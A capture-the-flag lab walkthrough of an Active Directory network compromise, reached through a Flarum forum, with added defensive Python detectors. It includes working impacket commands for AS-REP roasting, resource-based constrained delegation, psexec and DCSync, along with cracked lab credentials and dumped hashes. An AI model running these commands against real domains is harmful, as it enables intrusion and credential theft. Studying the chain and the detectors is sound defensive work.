
春秋云镜: Flarum


0x01 Information Gathering

┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-29 16:20:51] [INFO] 暴力破解线程数: 1
[2025-04-29 16:20:51] [INFO] 开始信息扫描
[2025-04-29 16:20:51] [INFO] 最终有效主机数量: 1
[2025-04-29 16:20:51] [INFO] 开始主机扫描
[2025-04-29 16:20:51] [INFO] 有效端口数量: 233
[2025-04-29 16:20:51] [SUCCESS] 端口开放 39.99.151.97:110
[2025-04-29 16:20:51] [SUCCESS] 端口开放 39.99.151.97:22
[2025-04-29 16:20:51] [SUCCESS] 服务识别 39.99.151.97:22 => [ssh] 版本:8.9p1 Ubuntu 3ubuntu0.3 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.3.]
[2025-04-29 16:20:52] [SUCCESS] 端口开放 39.99.151.97:80
[2025-04-29 16:20:53] [SUCCESS] 服务识别 39.99.151.97:110 =>
[2025-04-29 16:20:59] [SUCCESS] 服务识别 39.99.151.97:80 => [http]
[2025-04-29 16:21:01] [INFO] 存活端口数量: 3
[2025-04-29 16:21:01] [INFO] 开始漏洞扫描
[2025-04-29 16:21:01] [INFO] 加载的插件: pop3, ssh, webpoc, webtitle
[2025-04-29 16:21:01] [SUCCESS] 网站标题 http://39.99.151.97       状态码:200 长度:5867   标题:霄壤社区

0x02 Getting a shell on Flarum

The first task asks us to test the security of the admin login password. The homepage shows an administrator email address, so we take the standard rockyou wordlist and brute-force weak passwords. After more than 10,000 attempts it yields 1chris. We log in and search online for usable Flarum vulnerabilities.
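The weak admin password above is found by hammering the login form, which is exactly the pattern a defender can see in the web server's access log. The following is an added example, not code from the writeup or from Flarum: it parses access-log lines in the common "combined" format, keeps only POST requests to the login endpoint that were rejected, and raises an alert once a client IP accumulates a threshold of failures inside a sliding window, noting whether that client later got a successful login. The path /login, the 401 failure status, the thresholds and the sample lines are constructed assumptions for the example.

```python
"""Flag brute-force or spraying against a web login from access logs.

Added example, not part of the original writeup. Endpoint path, failure
status, thresholds and the sample log lines below are assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LOGIN_PATH = "/login"          # assumed login endpoint
FAILURE_STATUSES = {401}       # assumed "bad credentials" status
THRESHOLD = 5                  # failures per IP that trigger an alert
WINDOW_SECONDS = 60            # sliding window length

# nginx/Apache "combined" format: ip - user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Constructed sample: one client fails six times in 10 seconds, then succeeds.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Apr/2025:16:30:01 +0800] "POST /login HTTP/1.1" 401 55 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Apr/2025:16:30:03 +0800] "POST /login HTTP/1.1" 401 55 "-" "Mozilla/5.0"
198.51.100.5 - - [29/Apr/2025:16:30:04 +0800] "POST /login HTTP/1.1" 401 55 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Apr/2025:16:30:05 +0800] "POST /login HTTP/1.1" 401 55 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Apr/2025:16:30:07 +0800] "POST /login HTTP/1.1" 401 55 "-" "Mozilla/5.0"
192.0.2.10 - - [29/Apr/2025:16:30:08 +0800] "GET / HTTP/1.1" 200 5867 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Apr/2025:16:30:09 +0800] "POST /login HTTP/1.1" 401 55 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Apr/2025:16:30:11 +0800] "POST /login HTTP/1.1" 401 55 "-" "Mozilla/5.0"
198.51.100.5 - - [29/Apr/2025:16:30:12 +0800] "POST /login HTTP/1.1" 401 55 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Apr/2025:16:30:13 +0800] "POST /login HTTP/1.1" 200 312 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status; None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def detect_bruteforce(lines, threshold=THRESHOLD, window=WINDOW_SECONDS):
    """Return one alert per IP whose login failures reach `threshold` within `window` seconds.

    Each alert records the failure count at trigger time and whether the same IP
    later obtained a 2xx/3xx on the login endpoint (a burst followed by success
    is the case worth investigating first).
    """
    recent = defaultdict(deque)   # ip -> timestamps of recent failures
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != LOGIN_PATH:
            continue
        ip, ts = rec["ip"], rec["ts"]
        if rec["status"] in FAILURE_STATUSES:
            q = recent[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window:   # drop failures outside the window
                q.popleft()
            if len(q) >= threshold and ip not in alerts:
                alerts[ip] = {"ip": ip, "failures": len(q), "window_start": q[0],
                              "window_end": ts, "success_after_burst": False}
        elif 200 <= rec["status"] < 400 and ip in alerts:
            alerts[ip]["success_after_burst"] = True
    return sorted(alerts.values(), key=lambda a: a["window_end"])


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{a['ip']}: {a['failures']} login failures between {a['window_start']:%H:%M:%S} "
              f"and {a['window_end']:%H:%M:%S}; success afterwards: {a['success_after_burst']}")
```

The same logic runs unchanged on a live `tail -f` of the access log; the mitigation side (per-IP rate limiting at the reverse proxy, account lockout or MFA on the admin account) is what makes the 10,000-guess run in the writeup fail.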

Following the steps above we obtain a shell, and we use msf for persistence. Looking around the host for a way to escalate privileges, the usual sudo and find checks turn up nothing usable, but we do come across the configuration file and decide to look in the database next.

<?php return array (
  'debug' => false,
  'database' =>
  array (
    'driver' => 'mysql',
    'host' => 'localhost',
    'port' => 3306,
    'database' => 'flarum',
    'username' => 'root',
    'password' => 'Mysql@root123',
    'charset' => 'utf8mb4',
    'collation' => 'utf8mb4_unicode_ci',
    'prefix' => 'flarum_',
    'strict' => false,
    'engine' => 'InnoDB',
    'prefix_indexes' => true,
  ),
  'url' => 'http://'.$_SERVER['HTTP_HOST'],
  'paths' =>
  array (
    'api' => 'api',
    'admin' => 'admin',
  ),
  'headers' =>
  array (
    'poweredByHeader' => true,
    'referrerPolicy' => 'same-origin',
  ),
);

0x03 Looking for privilege escalation via capabilities

The database contains no flag and no potential user credentials either. Turning to another Linux privilege escalation technique, we try capabilities.

www-data@web01:~/html$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/snap/core20/1974/usr/bin/ping cap_net_raw=ep
/snap/core20/1405/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep

We can escalate with openssl, since the cap_net_bind_service capability lets us use openssl to open a port and retrieve the contents of a given file. This gives us flag1.
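The `getcap -r /` listing above is the kind of inventory a host review should produce routinely, and the useful part is knowing which of the listed capabilities matter. The following is an added example, not code from the writeup: it parses getcap's text output (the newer `path cap,cap=flags` form and the older `path = cap+flags` form), classifies each capability by the kind of access it grants, and lists the binaries to review first. The risk tables are the example's own judgement; the sample input is constructed from the getcap output shown above.

```python
"""Classify file capabilities from `getcap -r /` output.

Added example, not part of the original writeup. The risk tables below are
the example's own; the sample input is constructed from the writeup's output.
"""
import re
from dataclasses import dataclass, field

# Constructed from the getcap output shown in the writeup.
SAMPLE_GETCAP = """\
/snap/core20/1974/usr/bin/ping cap_net_raw=ep
/snap/core20/1405/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
"""

# Capabilities that let a binary step over ordinary file or identity checks.
HIGH_RISK = {
    "cap_dac_read_search": "bypasses read permission checks on every file",
    "cap_dac_override": "bypasses read/write/execute permission checks",
    "cap_setuid": "can change to any UID, including root",
    "cap_setgid": "can change to any GID",
    "cap_sys_admin": "broad administrative control (mounts, namespaces, ...)",
    "cap_sys_ptrace": "can attach to and read other processes",
    "cap_sys_module": "can load kernel modules",
    "cap_chown": "can change file ownership",
    "cap_fowner": "bypasses ownership checks on file operations",
    "cap_setfcap": "can set file capabilities on other binaries",
}

# Network capabilities: expected on ping/mtr-style tools, worth noting elsewhere.
NETWORK = {
    "cap_net_raw": "raw sockets (packet capture, crafted packets)",
    "cap_net_admin": "network configuration (interfaces, routes, firewall)",
    "cap_net_bind_service": "bind to ports below 1024",
}

# "path cap,cap=ep"  or the older  "path = cap,cap+ep"
LINE_RE = re.compile(
    r"^(?P<path>\S+)\s+=?\s*(?P<caps>cap_[a-z_]+(?:,cap_[a-z_]+)*)[=+](?P<flags>[eip]+)\s*$"
)


@dataclass
class CapEntry:
    path: str
    caps: list
    flags: str
    risk: str                       # "high", "medium" or "low"
    notes: list = field(default_factory=list)


def parse_getcap(text):
    """Parse getcap output into CapEntry objects; unrecognised lines are skipped, not guessed."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        caps = m.group("caps").split(",")
        risk, notes = "low", []
        for cap in caps:
            if cap in HIGH_RISK:
                risk = "high"
                notes.append(f"{cap}: {HIGH_RISK[cap]}")
            elif cap in NETWORK:
                if risk == "low":
                    risk = "medium"
                notes.append(f"{cap}: {NETWORK[cap]}")
            else:
                notes.append(f"{cap}: not in the reference table, review manually")
        entries.append(CapEntry(m.group("path"), caps, m.group("flags"), risk, notes))
    return entries


def high_risk_paths(text):
    """Binaries carrying at least one HIGH_RISK capability."""
    return [e.path for e in parse_getcap(text) if e.risk == "high"]


def report(text):
    """Human-readable lines, highest risk first."""
    order = {"high": 0, "medium": 1, "low": 2}
    lines = []
    for e in sorted(parse_getcap(text), key=lambda e: order[e.risk]):
        lines.append(f"[{e.risk.upper():6}] {e.path} ({','.join(e.caps)}={e.flags})")
        lines.extend(f"          {n}" for n in e.notes)
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_GETCAP)))
```

On the sample, every entry comes out as medium: raw-socket and port-binding rights on ping, mtr-packet and the GStreamer PTP helper are the distribution's defaults. Anything in the high tier on a general-purpose binary (an interpreter, an archiver, a crypto tool) is the finding to chase, and `setcap -r <path>` is the remediation once the reason it was granted is understood.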

www-data@web01:/$ openssl enc -in "/root/flag/flag01.txt"
openssl enc -in "/root/flag/flag01.txt"
                                 _         _       _   _                 
  ___ ___  _ __   __ _ _ __ __ _| |_ _   _| | __ _| |_(_) ___  _ __  ___ 
 / __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
 \___\___/|_| |_|\__, |_|  \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
                 |___/                                                   

flag01: flag{5d0d0068-2e33-4ec5-961d-5d44754d7665}

0x04 Internal network reconnaissance

We scan the internal network.

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.60.15    is alive
(icmp) Target 172.22.60.42    is alive
(icmp) Target 172.22.60.8     is alive
(icmp) Target 172.22.60.52    is alive
[*] Icmp alive hosts len is: 4
172.22.60.8:445 open
172.22.60.42:445 open
172.22.60.15:445 open
172.22.60.8:139 open
172.22.60.42:139 open
172.22.60.15:139 open
172.22.60.8:135 open
172.22.60.42:135 open
172.22.60.15:135 open
172.22.60.52:80 open
172.22.60.52:22 open
172.22.60.52:8083 open
172.22.60.52:8081 open
172.22.60.8:88 open
[*] alive ports len is: 14
start vulscan
[*] NetInfo
[*]172.22.60.8
   [->]DC
   [->]172.22.60.8
   [->]169.254.92.116
[*] NetBios 172.22.60.8     [+] DC:XIAORANG\DC
[*] NetBios 172.22.60.15    XIAORANG\PC1
[*] NetBios 172.22.60.42    XIAORANG\FILESERVER
[*] NetInfo
[*]172.22.60.42
   [->]Fileserver
   [->]172.22.60.42
   [->]169.254.34.219
[*] NetInfo
[*]172.22.60.15
   [->]PC1
   [->]172.22.60.15
   [->]169.254.118.249
[*] WebTitle https://172.22.60.52:8083 code:200 len:260    title:None
[*] WebTitle https://172.22.60.52:8081 code:200 len:260    title:None
[*] WebTitle http://172.22.60.52       code:200 len:5867   title:霄壤社区
已完成 14/14

Recalling the usernames we pulled from the database earlier, and with no other web service to use as an entry point here, we first try AS-REP roasting.

┌──(root㉿kali)-[/home/kali/ichunqiu]
└─# proxychains4 -q impacket-GetNPUsers xiaorang.lab/ -usersfile user.txt -dc-ip 172.22.60.8
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
$krb5asrep$23$zhangxin@XIAORANG.LAB:a3599f8e07ea08e6cfddcf111b3461d8$6d9d76cd7f134857892884bf80577fddc553f316025338cd960c0948ce5f3574672b53386939b56697a68d30e07128c77531da64f2242041212cdfe82b6a48a63633b3ccda6b696f96c05dfb19d4b6f6411aeb023ff0d63bd33de580bbd3aea95701c556a4ad693a11ca33b99f13d060e48d8143849dbf1135838551abc258d2f20ce4a565a6746a7f58d71d10502fb52bcceb12b6466e0d033c95a270c48fc40a241be33bbce9d27dd69576e6e05d1aaf617ef403bd7d33096ca74a5aed257d69b6bc7d7453a2d4114945db7cfbb92c73d8f6c7f7e207e3ab43cf29db4d6a6fcc76fb8b779eaa02f27eef5f
$krb5asrep$23$wangyun@XIAORANG.LAB:f3959c5951123f33d535b91c819dccb9$493fdecfafb796c653fd8c3079efd515c50e86aed100ca6bb0aa13cfdaa99a1b333329e286f4e5728e7d2ef44bfa4891d2aec08c62b36d5f2ec5bad1803a71ee49f80fc7c3780d145cd055e9ad3a2e593ff68121175b232ce22f9391730d4bdd94c074f31fa5e3def9e118e130abd08bc483e61ad5fa8e9cd0bdef7f6f8eb8d7e382e9f37c35fe2b016969ca58f2373acb54d810e56708e77b3692306ab4eb57b630ae4341a1a666b87b2d50cbe799fcd0d57dff36c0b266e8e9365b65bd60f7d235c24f4f06067a671ecf52a0fd2146fe828649db05c6aeba9a263b315d7ef8de2d8df7d977fc50fb68af85

We get two hashes and try to crack both users' passwords. Only wangyun:Adm12geC comes out. We could also go straight from AS-REP to Kerberoasting, but it probably will not be that hard, so we start probing with wangyun.

$krb5asrep$23$wangyun@XIAORANG.LAB:f3959c5951123f33d535b91c819dccb9$493fdecfafb796c653fd8c3079efd515c50e86aed100ca6bb0aa13cfdaa99a1b333329e286f4e5728e7d2ef44bfa4891d2aec08c62b36d5f2ec5bad1803a71ee49f80fc7c3780d145cd055e9ad3a2e593ff68121175b232ce22f9391730d4bdd94c074f31fa5e3def9e118e130abd08bc483e61ad5fa8e9cd0bdef7f6f8eb8d7e382e9f37c35fe2b016969ca58f2373acb54d810e56708e77b3692306ab4eb57b630ae4341a1a666b87b2d50cbe799fcd0d57dff36c0b266e8e9365b65bd60f7d235c24f4f06067a671ecf52a0fd2146fe828649db05c6aeba9a263b315d7ef8de2d8df7d977fc50fb68af85:Adm12geC

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$wangyun@XIAORANG.LAB:f3959c5951123f33...68af85
Time.Started.....: Tue Apr 29 18:04:14 2025 (0 secs)
Time.Estimated...: Tue Apr 29 18:04:14 2025 (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 44124.8 kH/s (1.46ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3933082/14344386 (27.42%)
Rejected.........: 922/3933082 (0.02%)
Restore.Point....: 1966135/14344386 (13.71%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: bradyp -> se803113
Hardware.Mon.#1..: Temp: 30c Util:  8% Core:1500MHz Mem:14001MHz Bus:8
┌──(root㉿kali)-[/home/kali/ichunqiu]
└─# proxychains4 -q crackmapexec smb 172.22.60.15 -d xiaorang.lab -u wangyun -p Adm12geC
SMB         172.22.60.15    445    PC1              [*] Windows 10 / Server 2019 Build 17763 x64 (name:PC1) (domain:xiaorang.lab) (signing:False) (SMBv1:False)
SMB         172.22.60.15    445    PC1              [+] xiaorang.lab\wangyun:Adm12geC
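The two AS-REP hashes above exist only because those accounts have "Do not require Kerberos preauthentication" set (the UF_DONT_REQUIRE_PREAUTH bit, 0x400000, in userAccountControl), so the directory itself is the place to find the exposure before anyone roasts it. The following is an added example, not code from the writeup: it parses a minimal LDIF-style export of sAMAccountName and userAccountControl, decodes the flag bits, and lists the enabled accounts that have pre-authentication disabled. The account names and values in the sample are constructed.

```python
"""Find enabled accounts with Kerberos pre-authentication disabled from an LDIF export.

Added example, not part of the original writeup. The LDIF sample is constructed;
only plain "key: value" lines are handled (no base64 "::" values, no folding).
"""

# userAccountControl bits (documented Windows values), sorted by bit when decoding.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000

# Constructed sample export: one exposed service account, one normal user,
# one disabled account that also has pre-auth off, one workstation.
SAMPLE_LDIF = """\
dn: CN=svc_backup,OU=Service Accounts,DC=example,DC=lab
sAMAccountName: svc_backup
userAccountControl: 4260352

dn: CN=jdoe,OU=Users,DC=example,DC=lab
sAMAccountName: jdoe
userAccountControl: 512

dn: CN=olduser,OU=Users,DC=example,DC=lab
sAMAccountName: olduser
userAccountControl: 4194818

dn: CN=WS01,OU=Computers,DC=example,DC=lab
sAMAccountName: WS01$
userAccountControl: 4096
"""


def parse_ldif(text):
    """Split a simple LDIF dump into one dict per blank-line-separated record."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        entries.append(current)
    return entries


def decode_uac(value):
    """Return the names of the set userAccountControl bits, lowest bit first."""
    value = int(value)
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def find_asrep_roastable(entries):
    """sAMAccountNames of enabled accounts with DONT_REQ_PREAUTH set."""
    found = []
    for e in entries:
        uac = int(e.get("userAccountControl", 0))
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            found.append(e["sAMAccountName"])
    return found


def report(entries):
    """One line per account that has pre-auth disabled, enabled or not."""
    lines = []
    for e in entries:
        uac = int(e.get("userAccountControl", 0))
        if uac & DONT_REQ_PREAUTH:
            state = "DISABLED" if uac & ACCOUNTDISABLE else "ENABLED"
            lines.append(f"{e['sAMAccountName']:<16} {state:<9} {' | '.join(decode_uac(uac))}")
    return lines


if __name__ == "__main__":
    recs = parse_ldif(SAMPLE_LDIF)
    print("AS-REP roastable:", find_asrep_roastable(recs))
    print("\n".join(report(recs)))
```

Disabled accounts with the bit set are reported too, since re-enabling one silently re-creates the exposure. The fix is to clear the flag (it is almost never required by modern clients) and to give any account that genuinely needs it a long random password, which is what defeats the rockyou run shown in the hashcat output above.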

0x05 Extracting passwords from Xshell

Authentication succeeds only on PC1. We log in to PC1 to grab the flag, but to our disappointment there is no flag at all, which means we still have to escalate. privgroups shows nothing useful, so we turn to BloodHound, which also shows nothing obvious. We notice Xshell on the desktop and try to extract its saved passwords.

It immediately gives us zhangxin:admin4qwY38cc, and we log in as this user.


Next we analyze the BloodHound data we just collected and see that zhangxin has GenericAll over Fileserver. We try RBCD or shadow credentials.


┌──(root㉿kali)-[~]
└─# proxychains4 -q addcomputer.py xiaorang.lab/zhangxin:'admin4qwY38cc' -computer-name gailo\$ -computer-pass 123456 -dc-host DC.xiaorang.lab -dc-ip 172.22.60.8  
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account gailo$ with password 123456.

┌──(root㉿kali)-[~]
└─# proxychains4 -q rbcd.py xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8  -action write -delegate-to fileserver\$ -delegate-from gailo\$
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] gailo$ can now impersonate users on fileserver$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     gailo$       (S-1-5-21-3535393121-624993632-895678587-1116)

┌──(root㉿kali)-[~]
└─# proxychains4 -q getST.py -dc-ip 172.22.60.8 -spn cifs/Fileserver.xiaorang.lab -impersonate Fileserver\$ xiaorang.lab/gailo\$:123456
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Fileserver$
/usr/local/bin/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/local/bin/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/local/bin/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/local/bin/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in Fileserver$@cifs_Fileserver.xiaorang.lab@XIAORANG.LAB.ccache

┌──(root㉿kali)-[/home/kali/ichunqiu]
└─# proxychains4 -q psexec.py Administrator@FILESERVER.xiaorang.lab -k -no-pass -dc-ip 172.22.60.8
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

And we get flag03.


Since we have DCSync rights, secretsdump directly gives us the administrator's NTLM hash.

┌──(root㉿kali)-[/home/kali/ichunqiu]
└─# proxychains4 -q impacket-secretsdump -k -no-pass  FILESERVER.xiaorang.lab -dc-ip 172.22.60.8                                      
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xef418f88c0327e5815e32083619efdf5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:80b4e1ddf6eefa113be0b357d1242976:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b40dda6fd91a2212d118d83e94b61b11:::
[*] Dumping cached domain logon information (domain/username:hash)
XIAORANG.LAB/Administrator:$DCC2$10240#Administrator#f9224930044d24598d509aeb1a015766: (2023-08-02 07:52:21)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
XIAORANG\Fileserver$:plain_password_hex:3000310078005b003b0049004e003500450067003e00300039003f0074006c00630024003500450023002800220076003c004b0057005e0063006b005100580024007300620053002e0038002c0060003e00420021007200230030003700470051007200640054004e0078006000510070003300310074006d006b004c002e002f0059003b003f0059002a005d002900640040005b0071007a0070005d004000730066006f003b0042002300210022007400670045006d0023002a002800330073002c00320063004400720032002f003d0078006a002700550066006e002f003a002a0077006f0078002e0066003300
XIAORANG\Fileserver$:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x15367c548c55ac098c599b20b71d1c86a2c1f610
dpapi_userkey:0x28a7796c724094930fc4a3c5a099d0b89dccd6d1
[*] NL$KM 
 0000   8B 14 51 59 D7 67 45 80  9F 4A 54 4C 0D E1 D3 29   ..QY.gE..JTL...)
 0010   3E B6 CC 22 FF B7 C5 74  7F E4 B0 AD E7 FA 90 0D   >.."...t........
 0020   1B 77 20 D5 A6 67 31 E9  9E 38 DD 95 B0 60 32 C4   .w ..g1..8...`2.
 0030   BE 8E 72 4D 0D 90 01 7F  01 30 AC D7 F8 4C 2B 4A   ..rM.....0...L+J
NL$KM:8b145159d76745809f4a544c0de1d3293eb6cc22ffb7c5747fe4b0ade7fa900d1b7720d5a66731e99e38dd95b06032c4be8e724d0d90017f0130acd7f84c2b4a
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Then a pass-the-hash login finishes it. Note that the Administrator hash above is the hash of Fileserver's local Administrator; we need to use Fileserver's machine account hash to perform a DCSync.

┌──(root㉿kali)-[/home/kali/ichunqiu]
└─# proxychains4 -q secretsdump.py xiaorang.lab/'Fileserver$':@172.22.60.8 -hashes ':951d8a9265dfb652f42e5c8c497d70dc' -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3cfdc08527ec4ab6aa3e630e79d349b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:4502e83276d2275a8f22a0be848aee62471ba26d29e0a01e2e09ddda4ceea683
Administrator:aes128-cts-hmac-sha1-96:38496df9a109710192750f2fbdbe45b9
Administrator:des-cbc-md5:f72a9889a18cc408
[*] Cleaning up..
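The DRSUAPI replication request above leaves a clear trace on the domain controller: with "Audit Directory Service Access" enabled, the DC logs event 4662 whose Properties list the control-access GUIDs DS-Replication-Get-Changes (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) and DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2), and the subject is a file server's machine account rather than another DC. The following is an added example, not code from the writeup: it parses 4662 events in Windows event XML shape, extracts the GUIDs, and alerts on replication rights exercised by any account outside an allowlist of domain controller accounts. The event records are constructed for the example (the subject Fileserver$ and the DC name come from the writeup).

```python
"""Detect DCSync-style replication requests in Security event 4662 records.

Added example, not part of the original writeup. The three events below are
constructed in the shape of Windows event XML; their field values are samples.
"""
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Control-access rights that permit pulling directory secrets via replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{?([0-9a-fA-F-]{36})\}?")


def _event(subject, domain, properties):
    """Build a constructed 4662 record; %%7688 is the 'Control Access' property marker."""
    return f"""<Event xmlns="{NS['e']}">
  <System><EventID>4662</EventID><Computer>DC.xiaorang.lab</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">{subject}</Data>
    <Data Name="SubjectDomainName">{domain}</Data>
    <Data Name="ObjectType">%{{19195a5b-6da0-11d0-afd3-00c04fd930c9}}</Data>
    <Data Name="AccessMask">0x100</Data>
    <Data Name="Properties">%%7688
{properties}</Data>
  </EventData>
</Event>"""


REPL_PROPS = ("\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
              "\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n"
              "\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}")

# Constructed: a file server's machine account replicating (the writeup's case),
# a second DC doing legitimate replication, and an unrelated 4662 on a user object.
SAMPLE_EVENTS = [
    _event("Fileserver$", "XIAORANG", REPL_PROPS),
    _event("DC2$", "XIAORANG", REPL_PROPS),
    _event("jdoe", "XIAORANG", "\t{bf967aba-0de6-11d0-a285-00aa003049e2}"),
]


def parse_4662(xml_text):
    """Flatten an event's EventData into a dict keyed by Data Name, plus EventID and Computer."""
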